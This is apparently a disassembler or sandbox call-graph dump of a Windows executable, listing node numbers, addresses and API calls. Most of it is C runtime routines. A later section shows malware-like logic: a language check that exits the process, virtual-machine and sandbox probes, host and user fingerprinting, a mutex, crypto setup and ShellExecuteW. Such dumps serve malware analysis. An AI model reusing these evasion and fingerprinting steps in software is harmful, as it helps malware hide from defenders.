LoadLibraryA 11236->11238 11237->11235 11238->11233 11238->11236 11239 fb1490 11238->11239 11239->11238 11241 fb14d5 GetProcAddress 11239->11241 11240->11231 11241->11239 11242->11240 11244->10844 11246 fb8347 11245->11246 11247 fb8341 11245->11247 11269 fb834d SetLastError 11246->11269 11288 fba65c 11246->11288 11283 fba61d 11247->11283 11254 fb837d 11260 fba65c _unexpected 6 API calls 11254->11260 11255 fb8394 11259 fba65c _unexpected 6 API calls 11255->11259 11256 fb7d9b 11272 fb7dc6 11256->11272 11257 fb83e1 11258 fb7dc6 CallUnexpected 64 API calls 11257->11258 11261 fb83e6 11258->11261 11262 fb83a0 11259->11262 11263 fb838b 11260->11263 11264 fb83b5 11262->11264 11265 fb83a4 11262->11265 11300 fb7fb2 11263->11300 11306 fb8158 11264->11306 11267 fba65c _unexpected 6 API calls 11265->11267 11267->11263 11269->11256 11269->11257 11271 fb7fb2 _free 14 API calls 11271->11269 11469 fba9c7 11272->11469 11275 fb7dd6 11277 fb7de0 IsProcessorFeaturePresent 11275->11277 11282 fb7dff 11275->11282 11278 fb7dec 11277->11278 11280 fb695b _unexpected 8 API calls 11278->11280 11279 fb76a7 _unexpected 23 API calls 11281 fb7e09 11279->11281 11280->11282 11282->11279 11311 fba4dc 11283->11311 11285 fba639 11286 fba642 11285->11286 11287 fba654 TlsGetValue 11285->11287 11286->11246 11289 fba4dc _unexpected 5 API calls 11288->11289 11290 fba678 11289->11290 11291 fb8365 11290->11291 11292 fba696 TlsSetValue 11290->11292 11291->11269 11293 fb8830 11291->11293 11298 fb883d _unexpected 11293->11298 11294 fb887d 11324 fb881d 11294->11324 11295 fb8868 HeapAlloc 11296 fb8375 11295->11296 11295->11298 11296->11254 11296->11255 11298->11294 11298->11295 11299 fb6b82 _Allocate 2 API calls 11298->11299 11299->11298 11301 fb7fe6 __dosmaperr 11300->11301 11302 fb7fbd HeapFree 11300->11302 11301->11269 11302->11301 11303 fb7fd2 11302->11303 11304 fb881d __dosmaperr 12 API calls 11303->11304 11305 fb7fd8 GetLastError 11304->11305 11305->11301 11327 fb7fec 11306->11327 11312 fba50a 11311->11312 11316 fba506 _unexpected 11311->11316 11312->11316 11317 fba415 11312->11317 11315 fba524 GetProcAddress 11315->11316 11316->11285 11319 fba426 ___vcrt_FlsGetValue 11317->11319 11318 fba444 LoadLibraryExW 11318->11319 11320 fba45f GetLastError 11318->11320 11319->11318 11321 fba4ba FreeLibrary 11319->11321 11322 fba4d1 11319->11322 11323 fba492 LoadLibraryExW 11319->11323 11320->11319 11321->11319 11322->11315 11322->11316 11323->11319 11325 fb8481 __dosmaperr 14 API calls 11324->11325 11326 fb8822 11325->11326 11326->11296 11328 fb7ff8 __FrameHandler3::FrameUnwindToState 11327->11328 11341 fb860b EnterCriticalSection 11328->11341 11330 fb8002 11342 fb8032 11330->11342 11333 fb80fe 11334 fb810a __FrameHandler3::FrameUnwindToState 11333->11334 11346 fb860b EnterCriticalSection 11334->11346 11336 fb8114 11347 fb82df 11336->11347 11338 fb812c 11351 fb814c 11338->11351 11341->11330 11345 fb8653 LeaveCriticalSection 11342->11345 11344 fb8020 11344->11333 11345->11344 11346->11336 11348 fb8315 __fassign 11347->11348 11349 fb82ee __fassign 11347->11349 11348->11338 11349->11348 11354 fba0c4 11349->11354 11468 fb8653 LeaveCriticalSection 11351->11468 11353 fb813a 11353->11271 11355 fba144 11354->11355 11358 fba0da 11354->11358 11357 fb7fb2 _free 14 API calls 11355->11357 11380 fba192 11355->11380 11360 fba166 11357->11360 11358->11355 11363 fba10d 11358->11363 11365 fb7fb2 _free 14 API calls 11358->11365 11359 fba1a0 11369 fba200 11359->11369 11378 fb7fb2 14 API calls _free 11359->11378 11361 fb7fb2 _free 14 API calls 11360->11361 11362 fba179 11361->11362 11366 fb7fb2 _free 14 API calls 11362->11366 11367 fb7fb2 _free 14 API calls 11363->11367 11381 fba12f 11363->11381 11364 fb7fb2 _free 14 API calls 11368 fba139 11364->11368 11370 fba102 11365->11370 11372 fba187 11366->11372 11373 fba124 11367->11373 11374 fb7fb2 _free 14 API calls 11368->11374 11375 fb7fb2 _free 14 API calls 11369->11375 11382 fb9c2f 11370->11382 11376 fb7fb2 _free 14 API calls 11372->11376 11410 fb9d2d 11373->11410 11374->11355 11379 fba206 11375->11379 11376->11380 11378->11359 11379->11348 11422 fba235 11380->11422 11381->11364 11383 fb9d29 11382->11383 11384 fb9c40 11382->11384 11383->11363 11385 fb9c51 11384->11385 11386 fb7fb2 _free 14 API calls 11384->11386 11387 fb9c63 11385->11387 11388 fb7fb2 _free 14 API calls 11385->11388 11386->11385 11389 fb9c75 11387->11389 11391 fb7fb2 _free 14 API calls 11387->11391 11388->11387 11390 fb9c87 11389->11390 11392 fb7fb2 _free 14 API calls 11389->11392 11393 fb9c99 11390->11393 11394 fb7fb2 _free 14 API calls 11390->11394 11391->11389 11392->11390 11395 fb9cab 11393->11395 11396 fb7fb2 _free 14 API calls 11393->11396 11394->11393 11397 fb9cbd 11395->11397 11399 fb7fb2 _free 14 API calls 11395->11399 11396->11395 11398 fb9ccf 11397->11398 11400 fb7fb2 _free 14 API calls 11397->11400 11401 fb9ce1 11398->11401 11402 fb7fb2 _free 14 API calls 11398->11402 11399->11397 11400->11398 11403 fb9cf3 11401->11403 11404 fb7fb2 _free 14 API calls 11401->11404 11402->11401 11405 fb9d05 11403->11405 11407 fb7fb2 _free 14 API calls 11403->11407 11404->11403 11406 fb9d17 11405->11406 11408 fb7fb2 _free 14 API calls 11405->11408 11406->11383 11409 fb7fb2 _free 14 API calls 11406->11409 11407->11405 11408->11406 11409->11383 11411 fb9d3a 11410->11411 11412 fb9d92 11410->11412 11413 fb9d4a 11411->11413 11414 fb7fb2 _free 14 API calls 11411->11414 11412->11381 11415 fb9d5c 11413->11415 11416 fb7fb2 _free 14 API calls 11413->11416 11414->11413 11417 fb9d6e 11415->11417 11418 fb7fb2 _free 14 API calls 11415->11418 11416->11415 11419 fb9d80 11417->11419 11420 fb7fb2 _free 14 API calls 11417->11420 11418->11417 11419->11412 11421 fb7fb2 _free 14 API calls 11419->11421 11420->11419 11421->11412 11423 fba261 11422->11423 11424 fba242 11422->11424 11423->11359 11424->11423 11428 fb9dce 11424->11428 11427 fb7fb2 _free 14 API calls 11427->11423 11429 fb9eac 11428->11429 11430 fb9ddf 11428->11430 11429->11427 11464 fb9d96 11430->11464 11433 fb9d96 __fassign 14 API calls 11434 fb9df2 11433->11434 11435 fb9d96 __fassign 14 API calls 11434->11435 11436 fb9dfd 11435->11436 11437 fb9d96 __fassign 14 API calls 11436->11437 11438 fb9e08 11437->11438 11439 fb9d96 __fassign 14 API calls 11438->11439 11440 fb9e16 11439->11440 11441 fb7fb2 _free 14 API calls 11440->11441 11442 fb9e21 11441->11442 11443 fb7fb2 _free 14 API calls 11442->11443 11444 fb9e2c 11443->11444 11445 fb7fb2 _free 14 API calls 11444->11445 11446 fb9e37 11445->11446 11447 fb9d96 __fassign 14 API calls 11446->11447 11448 fb9e45 11447->11448 11449 fb9d96 __fassign 14 API calls 11448->11449 11450 fb9e53 11449->11450 11451 fb9d96 __fassign 14 API calls 11450->11451 11452 fb9e64 11451->11452 11453 fb9d96 __fassign 14 API calls 11452->11453 11454 fb9e72 11453->11454 11455 fb9d96 __fassign 14 API calls 11454->11455 11456 fb9e80 11455->11456 11457 fb7fb2 _free 14 API calls 11456->11457 11458 fb9e8b 11457->11458 11459 fb7fb2 _free 14 API calls 11458->11459 11460 fb9e96 11459->11460 11461 fb7fb2 _free 14 API calls 11460->11461 11462 fb9ea1 11461->11462 11463 fb7fb2 _free 14 API calls 11462->11463 11463->11429 11465 fb9dc9 11464->11465 11466 fb9db9 11464->11466 11465->11433 11466->11465 11467 fb7fb2 _free 14 API calls 11466->11467 11467->11466 11468->11353 11505 fba8f9 11469->11505 11472 fbaa0c 11473 fbaa18 __FrameHandler3::FrameUnwindToState 11472->11473 11474 fb8481 __dosmaperr 14 API calls 11473->11474 11478 fbaa45 _unexpected 11473->11478 11481 fbaa3f _unexpected 11473->11481 11474->11481 11475 fbaa8c 11477 fb881d __dosmaperr 14 API calls 11475->11477 11476 fbaa76 11476->11275 11479 fbaa91 11477->11479 11480 fbaab8 11478->11480 11519 fb860b EnterCriticalSection 11478->11519 11516 fb6b07 11479->11516 11485 fbabeb 11480->11485 11486 fbaafa 11480->11486 11495 fbab29 11480->11495 11481->11475 11481->11476 11481->11478 11488 fbabf6 11485->11488 11524 fb8653 LeaveCriticalSection 11485->11524 11491 fb832a _unexpected 66 API calls 11486->11491 11486->11495 11490 fb76a7 _unexpected 23 API calls 11488->11490 11496 fbabfe __FrameHandler3::FrameUnwindToState 11490->11496 11493 fbab1e 11491->11493 11492 fb832a _unexpected 66 API calls 11498 fbab7e 11492->11498 11494 fb832a _unexpected 66 API calls 11493->11494 11494->11495 11520 fbab98 11495->11520 11525 fbafa6 EnterCriticalSection 11496->11525 11498->11476 11500 fb832a _unexpected 66 API calls 11498->11500 11499 fbac15 _unexpected 11501 fbac4e 11499->11501 11526 fbae41 11499->11526 11500->11476 11536 fbac7f 11501->11536 11506 fba905 __FrameHandler3::FrameUnwindToState 11505->11506 11511 fb860b EnterCriticalSection 11506->11511 11508 fba913 11512 fba951 11508->11512 11511->11508 11515 fb8653 LeaveCriticalSection 11512->11515 11514 fb7dcb 11514->11275 11514->11472 11515->11514 11517 fb6aa3 _Allocate 25 API calls 11516->11517 11518 fb6b13 11517->11518 11518->11476 11519->11480 11521 fbab9e 11520->11521 11522 fbab6f 11520->11522 11539 fb8653 LeaveCriticalSection 11521->11539 11522->11476 11522->11492 11522->11498 11524->11488 11525->11499 11527 fbae4e 11526->11527 11528 fbae57 11526->11528 11540 fbad37 11527->11540 11543 fbaddc 11528->11543 11531 fbae54 11531->11501 11534 fbae73 11556 fbbf7b 11534->11556 11793 fbafba LeaveCriticalSection 11536->11793 11538 fbac6d 11538->11275 11539->11522 11567 fbac8b 11540->11567 11544 fbadf4 11543->11544 11548 fbae19 11543->11548 11545 fbb5ca _unexpected 25 API calls 11544->11545 11544->11548 11546 fbae12 11545->11546 11589 fbc773 11546->11589 11548->11531 11549 fbb5ca 11548->11549 11550 fbb5eb 11549->11550 11551 fbb5d6 11549->11551 11550->11534 11552 fb881d __dosmaperr 14 API calls 11551->11552 11553 fbb5db 11552->11553 11554 fb6b07 ___std_exception_copy 25 API calls 11553->11554 11555 fbb5e6 11554->11555 11555->11534 11557 fbbf8c 11556->11557 11559 fbbf99 11556->11559 11558 fb881d __dosmaperr 14 API calls 11557->11558 11566 fbbf91 11558->11566 11560 fbbfe2 11559->11560 11562 fbbfc0 11559->11562 11561 fb881d __dosmaperr 14 API calls 11560->11561 11563 fbbfe7 11561->11563 11774 fbbed9 11562->11774 11565 fb6b07 ___std_exception_copy 25 API calls 11563->11565 11565->11566 11566->11531 11568 fbac97 __FrameHandler3::FrameUnwindToState 11567->11568 11575 fb860b EnterCriticalSection 11568->11575 11570 fbaca1 _unexpected 11571 fbad0d 11570->11571 11576 fbabff 11570->11576 11584 fbad2b 11571->11584 11575->11570 11577 fbac0b __FrameHandler3::FrameUnwindToState 11576->11577 11587 fbafa6 EnterCriticalSection 11577->11587 11579 fbac15 _unexpected 11580 fbac4e 11579->11580 11583 fbae41 _unexpected 66 API calls 11579->11583 11581 fbac7f _unexpected LeaveCriticalSection 11580->11581 11582 fbac6d 11581->11582 11582->11570 11583->11580 11588 fb8653 LeaveCriticalSection 11584->11588 11586 fbad19 11586->11531 11587->11579 11588->11586 11590 fbc77f __FrameHandler3::FrameUnwindToState 11589->11590 11591 fbc79f 11590->11591 11592 fbc787 11590->11592 11593 fbc83a 11591->11593 11598 fbc7d1 11591->11598 11614 fb880a 11592->11614 11595 fb880a __dosmaperr 14 API calls 11593->11595 11597 fbc83f 11595->11597 11600 fb881d __dosmaperr 14 API calls 11597->11600 11617 fb98e2 EnterCriticalSection 11598->11617 11599 fb881d __dosmaperr 14 API calls 11602 fbc794 11599->11602 11603 fbc847 11600->11603 11602->11548 11605 fb6b07 ___std_exception_copy 25 API calls 11603->11605 11604 fbc7d7 11606 fbc808 11604->11606 11607 fbc7f3 11604->11607 11605->11602 11618 fbc865 11606->11618 11608 fb881d __dosmaperr 14 API calls 11607->11608 11610 fbc7f8 11608->11610 11612 fb880a __dosmaperr 14 API calls 11610->11612 11611 fbc803 11660 fbc832 11611->11660 11612->11611 11615 fb8481 __dosmaperr 14 API calls 11614->11615 11616 fb880f 11615->11616 11616->11599 11617->11604 11619 fbc887 11618->11619 11655 fbc8a3 11618->11655 11620 fbc88b 11619->11620 11622 fbc8db 11619->11622 11621 fb880a __dosmaperr 14 API calls 11620->11621 11623 fbc890 11621->11623 11624 fbc8f1 11622->11624 11663 fbcefc 11622->11663 11625 fb881d __dosmaperr 14 API calls 11623->11625 11666 fbc40c 11624->11666 11628 fbc898 11625->11628 11630 fb6b07 ___std_exception_copy 25 API calls 11628->11630 11630->11655 11631 fbc938 11633 fbc94c 11631->11633 11634 fbc992 WriteFile 11631->11634 11632 fbc8ff 11635 fbc903 11632->11635 11636 fbc925 11632->11636 11639 fbc982 11633->11639 11640 fbc954 11633->11640 11637 fbc9b5 GetLastError 11634->11637 11642 fbc91b 11634->11642 11641 fbc9ff 11635->11641 11673 fbc3a4 11635->11673 11678 fbbff8 GetConsoleOutputCP 11636->11678 11637->11642 11706 fbc47d 11639->11706 11643 fbc959 11640->11643 11644 fbc972 11640->11644 11647 fb881d __dosmaperr 14 API calls 11641->11647 11641->11655 11642->11641 11650 fbc9d5 11642->11650 11642->11655 11643->11641 11691 fbc558 11643->11691 11698 fbc641 11644->11698 11649 fbca20 11647->11649 11652 fb880a __dosmaperr 14 API calls 11649->11652 11653 fbc9dc 11650->11653 11654 fbc9f3 11650->11654 11652->11655 11656 fb881d __dosmaperr 14 API calls 11653->11656 11713 fb87e7 11654->11713 11655->11611 11658 fbc9e1 11656->11658 11659 fb880a __dosmaperr 14 API calls 11658->11659 11659->11655 11773 fb9905 LeaveCriticalSection 11660->11773 11662 fbc838 11662->11602 11718 fbce80 11663->11718 11740 fbcb2a 11666->11740 11668 fbc41d 11669 fb832a _unexpected 65 API calls 11668->11669 11672 fbc473 11668->11672 11671 fbc440 11669->11671 11670 fbc45a GetConsoleMode 11670->11672 11671->11670 11671->11672 11672->11631 11672->11632 11674 fbc3c6 11673->11674 11675 fbc3fb 11673->11675 11674->11675 11676 fbcf17 5 API calls _unexpected 11674->11676 11677 fbc3fd GetLastError 11674->11677 11675->11642 11676->11674 11677->11675 11749 fb7e6f 11678->11749 11680 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11683 fbc3a2 11680->11683 11681 fbc054 __InternalCxxFrameHandler 11684 fbb556 62 API calls __fassign 11681->11684 11685 fbc2fa 11681->11685 11687 fbc27d WriteFile 11681->11687 11689 fbcd4a 19 API calls _unexpected 11681->11689 11690 fbc2b5 WriteFile 11681->11690 11757 fb9eb2 11681->11757 11762 fb9625 11681->11762 11683->11642 11684->11681 11685->11680 11687->11681 11688 fbc372 GetLastError 11687->11688 11688->11685 11689->11681 11690->11681 11690->11688 11696 fbc567 _unexpected 11691->11696 11692 fbc626 11693 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11692->11693 11697 fbc63f 11693->11697 11694 fbc5dc WriteFile 11695 fbc628 GetLastError 11694->11695 11694->11696 11695->11692 11696->11692 11696->11694 11697->11642 11702 fbc650 _unexpected 11698->11702 11699 fbc758 11700 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11699->11700 11701 fbc771 11700->11701 11701->11642 11702->11699 11703 fb9625 _unexpected WideCharToMultiByte 11702->11703 11704 fbc75a GetLastError 11702->11704 11705 fbc70f WriteFile 11702->11705 11703->11702 11704->11699 11705->11702 11705->11704 11711 fbc48c _unexpected 11706->11711 11707 fbc53d 11708 fb3a94 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 11707->11708 11709 fbc556 11708->11709 11709->11642 11710 fbc4fc WriteFile 11710->11711 11712 fbc53f GetLastError 11710->11712 11711->11707 11711->11710 11712->11707 11714 fb880a __dosmaperr 14 API calls 11713->11714 11715 fb87f2 __dosmaperr 11714->11715 11716 fb881d __dosmaperr 14 API calls 11715->11716 11717 fb8805 11716->11717 11717->11655 11727 fb99b9 11718->11727 11720 fbce92 11721 fbceab SetFilePointerEx 11720->11721 11722 fbce9a 11720->11722 11724 fbcec3 GetLastError 11721->11724 11725 fbce9f 11721->11725 11723 fb881d __dosmaperr 14 API calls 11722->11723 11723->11725 11726 fb87e7 __dosmaperr 14 API calls 11724->11726 11725->11624 11726->11725 11728 fb99db 11727->11728 11729 fb99c6 11727->11729 11732 fb880a __dosmaperr 14 API calls 11728->11732 11734 fb9a00 11728->11734 11730 fb880a __dosmaperr 14 API calls 11729->11730 11731 fb99cb 11730->11731 11733 fb881d __dosmaperr 14 API calls 11731->11733 11735 fb9a0b 11732->11735 11736 fb99d3 11733->11736 11734->11720 11737 fb881d __dosmaperr 14 API calls 11735->11737 11736->11720 11738 fb9a13 11737->11738 11739 fb6b07 ___std_exception_copy 25 API calls 11738->11739 11739->11736 11741 fbcb37 11740->11741 11742 fbcb44 11740->11742 11743 fb881d __dosmaperr 14 API calls 11741->11743 11745 fbcb50 11742->11745 11746 fb881d __dosmaperr 14 API calls 11742->11746 11744 fbcb3c 11743->11744 11744->11668 11745->11668 11747 fbcb71 11746->11747 11748 fb6b07 ___std_exception_copy 25 API calls 11747->11748 11748->11744 11750 fb7e86 11749->11750 11751 fb7e8f 11749->11751 11750->11681 11751->11750 11752 fb832a _unexpected 66 API calls 11751->11752 11753 fb7eaf 11752->11753 11765 fbb570 11753->11765 11758 fb832a _unexpected 66 API calls 11757->11758 11759 fb9ebd 11758->11759 11760 fbb570 __fassign 66 API calls 11759->11760 11761 fb9ecd 11760->11761 11761->11681 11764 fb963c WideCharToMultiByte 11762->11764 11764->11681 11766 fb7ec5 11765->11766 11767 fbb583 11765->11767 11769 fbb59d 11766->11769 11767->11766 11768 fba310 __fassign 66 API calls 11767->11768 11768->11766 11770 fbb5b0 11769->11770 11771 fbb5c5 11769->11771 11770->11771 11772 fb9309 __fassign 66 API calls 11770->11772 11771->11750 11772->11771 11773->11662 11775 fbbee5 __FrameHandler3::FrameUnwindToState 11774->11775 11788 fb98e2 EnterCriticalSection 11775->11788 11777 fbbef4 11778 fbbf3b 11777->11778 11779 fb99b9 _unexpected 25 API calls 11777->11779 11780 fb881d __dosmaperr 14 API calls 11778->11780 11781 fbbf20 FlushFileBuffers 11779->11781 11782 fbbf40 11780->11782 11781->11782 11783 fbbf2c 11781->11783 11789 fbbf6f 11782->11789 11784 fb880a __dosmaperr 14 API calls 11783->11784 11787 fbbf31 GetLastError 11784->11787 11787->11778 11788->11777 11792 fb9905 LeaveCriticalSection 11789->11792 11791 fbbf58 11791->11566 11792->11791 11793->11538 11795 fb754c 11794->11795 11803 fb755d 11794->11803 11805 fb75e4 GetModuleHandleW 11795->11805 11799 fb7597 11799->10613 11812 fb7404 11803->11812 11806 fb7551 11805->11806 11806->11803 11807 fb7627 GetModuleHandleExW 11806->11807 11808 fb7646 GetProcAddress 11807->11808 11809 fb765b 11807->11809 11808->11809 11810 fb7678 11809->11810 11811 fb766f FreeLibrary 11809->11811 11810->11803 11811->11810 11813 fb7410 __FrameHandler3::FrameUnwindToState 11812->11813 11828 fb860b EnterCriticalSection 11813->11828 11815 fb741a 11829 fb7451 11815->11829 11817 fb7427 11833 fb7445 11817->11833 11820 fb75a2 11857 fb9763 GetPEB 11820->11857 11823 fb75d1 11826 fb7627 _unexpected 3 API calls 11823->11826 11824 fb75b1 GetPEB 11824->11823 11825 fb75c1 GetCurrentProcess TerminateProcess 11824->11825 11825->11823 11827 fb75d9 ExitProcess 11826->11827 11828->11815 11830 fb745d __FrameHandler3::FrameUnwindToState 11829->11830 11831 fb74be _unexpected 11830->11831 11836 fb7b65 11830->11836 11831->11817 11856 fb8653 LeaveCriticalSection 11833->11856 11835 fb7433 11835->11799 11835->11820 11839 fb7896 11836->11839 11840 fb78a2 __FrameHandler3::FrameUnwindToState 11839->11840 11847 fb860b EnterCriticalSection 11840->11847 11842 fb78b0 11848 fb7a75 11842->11848 11847->11842 11849 fb78bd 11848->11849 11850 fb7a94 11848->11850 11852 fb78e5 11849->11852 11850->11849 11851 fb7fb2 _free 14 API calls 11850->11851 11851->11849 11855 fb8653 LeaveCriticalSection 11852->11855 11854 fb78ce 11854->11831 11855->11854 11856->11835 11858 fb977d 11857->11858 11859 fb75ac 11857->11859 11861 fba55f 11858->11861 11859->11823 11859->11824 11862 fba4dc _unexpected 5 API calls 11861->11862 11863 fba57b 11862->11863 11863->11859 11865 fb7d18 ___scrt_uninitialize_crt 11864->11865 11866 fb7d06 11864->11866 11865->10658 11867 fb7d14 11866->11867 11869 fbae89 11866->11869 11867->10658 11870 fbad37 ___scrt_uninitialize_crt 66 API calls 11869->11870 11871 fbae90 11870->11871 11871->11867 11872 5a8dc0 GetUserDefaultLangID 11873 5a8e6c ExitProcess 11872->11873 11874 5a8ddd 11872->11874 11874->11873 11888 5a8610 11874->11888 11876 5a8e4a 11876->11873 11877 5a8e4e 11876->11877 11967 5a8330 InitializeCriticalSection 11877->11967 11879 5a8e53 11978 5a7160 ExpandEnvironmentStringsW lstrlenW 11879->11978 11881 5a8e58 11985 5a8f20 CryptGenRandom 11881->11985 11887 5a8e67 11887->11873 11889 5a861d 11888->11889 11890 5a8632 EnumDisplayDevicesW 11889->11890 11891 5a86ca GetModuleHandleA GetProcAddress GetProcAddress 11890->11891 11892 5a865a 11890->11892 11894 5a8700 11891->11894 11895 5a8706 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 11891->11895 11893 5a8660 StrStrIW 11892->11893 11898 5a8677 StrStrIW 11893->11898 11899 5a8765 11893->11899 11894->11895 11896 5a876e SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 11895->11896 11897 5a8746 11895->11897 11908 5a87c6 11896->11908 11897->11896 11900 5a874a GetFileAttributesW 11897->11900 11898->11899 11902 5a868d StrStrIW 11898->11902 11899->11876 11900->11896 11903 5a8758 11900->11903 11902->11899 11904 5a86a3 StrStrIW 11902->11904 11903->11896 11905 5a875c 11903->11905 11904->11899 11906 5a86b9 EnumDisplayDevicesW 11904->11906 11905->11899 11906->11891 11906->11893 11907 5a87f5 PathCombineW GetFileAttributesW 11907->11908 11908->11899 11908->11907 11909 5a8839 11908->11909 11909->11899 11910 5a8848 PathCombineW PathCombineW GetFileAttributesW 11909->11910 11911 5a8a0e PathCombineW GetFileAttributesW 11910->11911 11912 5a8890 11910->11912 11914 5a8af9 ExpandEnvironmentStringsW GetFileAttributesW 11911->11914 11915 5a8a39 11911->11915 11912->11911 11913 5a8898 GetFileAttributesW 11912->11913 11913->11911 11918 5a88aa 11913->11918 11916 5a8b1e 11914->11916 11917 5a8b43 GetComputerNameW GetUserNameW 11914->11917 11915->11914 11919 5a8a41 CreateFileW 11915->11919 11916->11917 11920 5a8b22 GetFileAttributesExW 11916->11920 11922 5a8bb0 lstrcmpW 11917->11922 11918->11911 11921 5a88b2 CreateFileW 11918->11921 11923 5a8a6f GetFileSize GetProcessHeap HeapAlloc 11919->11923 11924 5a8ab2 11919->11924 11920->11917 11927 5a8b39 11920->11927 11928 5a892e CreateFileW 11921->11928 11929 5a88ed GetFileSize GetProcessHeap HeapAlloc 11921->11929 11922->11899 11930 5a8bc8 11922->11930 11931 5a8aa9 CloseHandle 11923->11931 11932 5a8a90 ReadFile 11923->11932 11925 5a8adb 11924->11925 11926 5a8abc lstrcmpA 11924->11926 11933 5a8aef 11925->11933 11934 5a8adf GetProcessHeap HeapFree 11925->11934 11926->11925 11927->11899 11927->11917 11938 5a8998 11928->11938 11939 5a8955 GetFileSize GetProcessHeap HeapAlloc 11928->11939 11935 5a8910 ReadFile 11929->11935 11936 5a8927 CloseHandle 11929->11936 11930->11922 11937 5a8bcf StrStrW 11930->11937 11931->11924 11932->11931 11933->11899 11933->11914 11934->11933 11935->11936 11936->11928 11937->11899 11941 5a8be9 11937->11941 11940 5a89d9 11938->11940 11944 5a89a8 lstrcmpA 11938->11944 11942 5a898f CloseHandle 11939->11942 11943 5a8976 ReadFile 11939->11943 11945 5a89f0 11940->11945 11946 5a89e0 GetProcessHeap HeapFree 11940->11946 11947 5a8c00 lstrcmpW 11941->11947 11951 5a8c1c GlobalMemoryStatusEx 11941->11951 11942->11938 11943->11942 11944->11940 11948 5a89ba lstrcmpA 11944->11948 11949 5a8a04 11945->11949 11950 5a89f4 GetProcessHeap HeapFree 11945->11950 11946->11945 11947->11899 11947->11941 11948->11940 11949->11899 11949->11911 11950->11949 11951->11899 11952 5a8c4f PathCombineW 11951->11952 11953 5a8c70 11952->11953 11953->11953 11954 5a8c80 FindFirstFileW 11953->11954 11955 5a8d92 GetModuleFileNameW StrStrIW 11954->11955 11956 5a8ca0 11954->11956 11955->11876 11957 5a8cb0 lstrcmpW 11956->11957 11958 5a8cc6 lstrcmpW 11957->11958 11959 5a8d64 FindNextFileW 11957->11959 11958->11959 11961 5a8cdc lstrcmpW 11958->11961 11959->11957 11960 5a8d7a FindClose 11959->11960 11960->11899 11960->11955 11963 5a8d1b lstrcmpW 11961->11963 11964 5a8d27 lstrcmpW 11961->11964 11963->11964 11965 5a8d3f 11963->11965 11964->11965 11966 5a8d33 lstrcmpW 11964->11966 11965->11959 11966->11965 11968 5a8363 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 11967->11968 12025 5a7000 11967->12025 11971 5a841f 11968->11971 11972 5a8511 ExitProcess 11968->11972 12033 5a2490 GetTickCount 11971->12033 11974 5a8424 WSAStartup CryptAcquireContextA 11975 5a846f CryptAcquireContextA 11974->11975 11977 5a848f CoInitializeEx ExpandEnvironmentStringsW CreateFileW 11974->11977 11975->11972 11975->11977 11977->11879 11979 5a71a7 GetSystemWow64DirectoryW 11978->11979 11980 5a7194 ExpandEnvironmentStringsW 11978->11980 11981 5a71bd GetLastError 11979->11981 11982 5a71c3 ExpandEnvironmentStringsW wnsprintfW 11979->11982 11980->11979 11981->11982 12035 5a6bb0 VariantInit CoCreateInstance 11982->12035 11986 5a8f5c 11985->11986 12071 5a2630 GetProcessHeap HeapAlloc 11986->12071 11989 5a8f9e 11991 5a2630 2 API calls 11989->11991 11990 5a8f92 GetProcessHeap HeapFree 11990->11989 11992 5a8fad 11991->11992 11993 5a8fb6 wsprintfA 11992->11993 11994 5a8e5d 11992->11994 11995 5a8fe1 11993->11995 11998 5a7640 GetPEB LsaOpenPolicy 11994->11998 11997 5a8fff GetProcessHeap HeapFree GetProcessHeap HeapFree 11995->11997 12073 5a6690 ObtainUserAgentString MultiByteToWideChar 11995->12073 11997->11994 11999 5a76fb GetComputerNameW GetUserNameW 11998->11999 12000 5a7686 LsaQueryInformationPolicy 11998->12000 12001 5a774b 11999->12001 12002 5a7699 12000->12002 12003 5a76f2 LsaClose 12000->12003 12006 5a2490 GetTickCount 12001->12006 12008 5a777a 12001->12008 12004 5a76eb LsaFreeMemory 12002->12004 12005 5a76a1 GetProcessHeap HeapAlloc 12002->12005 12003->11999 12004->12003 12007 5a76be 12005->12007 12006->12001 12007->12004 12009 5a7789 wsprintfA wsprintfA 12008->12009 12010 5a77e6 12009->12010 12010->12010 12011 5a6690 32 API calls 12010->12011 12012 5a781a 12011->12012 12013 5a782d GetProcessHeap HeapFree 12012->12013 12014 5a7835 12012->12014 12013->12014 12015 5a7839 GetProcessHeap HeapFree 12014->12015 12016 5a7841 12014->12016 12015->12016 12017 5a8520 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 12016->12017 12018 5a8570 12017->12018 12018->12018 12019 5a8580 GetFileAttributesW 12018->12019 12020 5a859f GetFileAttributesW 12019->12020 12021 5a8594 12019->12021 12022 5a8598 12020->12022 12023 5a85c3 wnsprintfW ShellExecuteW 12020->12023 12021->12020 12021->12022 12022->12023 12024 5a85b6 lstrcpyW 12022->12024 12023->11887 12024->12023 12026 5a701e RegOpenKeyExW 12025->12026 12027 5a7041 RegQueryValueExW 12026->12027 12029 5a708d 12026->12029 12028 5a7059 GetProcessHeap HeapAlloc 12027->12028 12027->12029 12028->12029 12030 5a7075 RegQueryValueExW 12028->12030 12029->12026 12031 5a7090 RegCloseKey 12029->12031 12032 5a70bb 12029->12032 12030->12031 12031->12029 12031->12032 12032->11968 12034 5a24a0 12033->12034 12034->11974 12034->12034 12036 5a6c0b 12035->12036 12043 5a6c5a 12035->12043 12039 5a6c3c SysAllocString 12036->12039 12036->12043 12037 5a6c7d SysFreeString 12038 5a6c80 12037->12038 12040 5a6fc8 SetFileAttributesW 12038->12040 12041 5a6c8a SysAllocString 12038->12041 12039->12043 12040->11881 12042 5a6cad SysFreeString 12041->12042 12044 5a6cdd 12042->12044 12045 5a6cbd SysAllocString 12042->12045 12043->12037 12043->12038 12046 5a6ce1 SysAllocString 12044->12046 12049 5a6cf9 12044->12049 12047 5a6cd4 SysFreeString 12045->12047 12048 5a6cf6 SysFreeString 12046->12048 12047->12044 12048->12049 12049->12040 12050 5a6d2f SysAllocString 12049->12050 12053 5a6d67 12049->12053 12051 5a6d42 SysFreeString SysAllocString 12050->12051 12052 5a6d58 SysFreeString 12051->12052 12052->12053 12054 5a6dcb 12053->12054 12055 5a6da9 SysAllocString 12053->12055 12058 5a6e2a SysAllocString 12054->12058 12060 5a6e8d 12054->12060 12056 5a6dbc SysFreeString 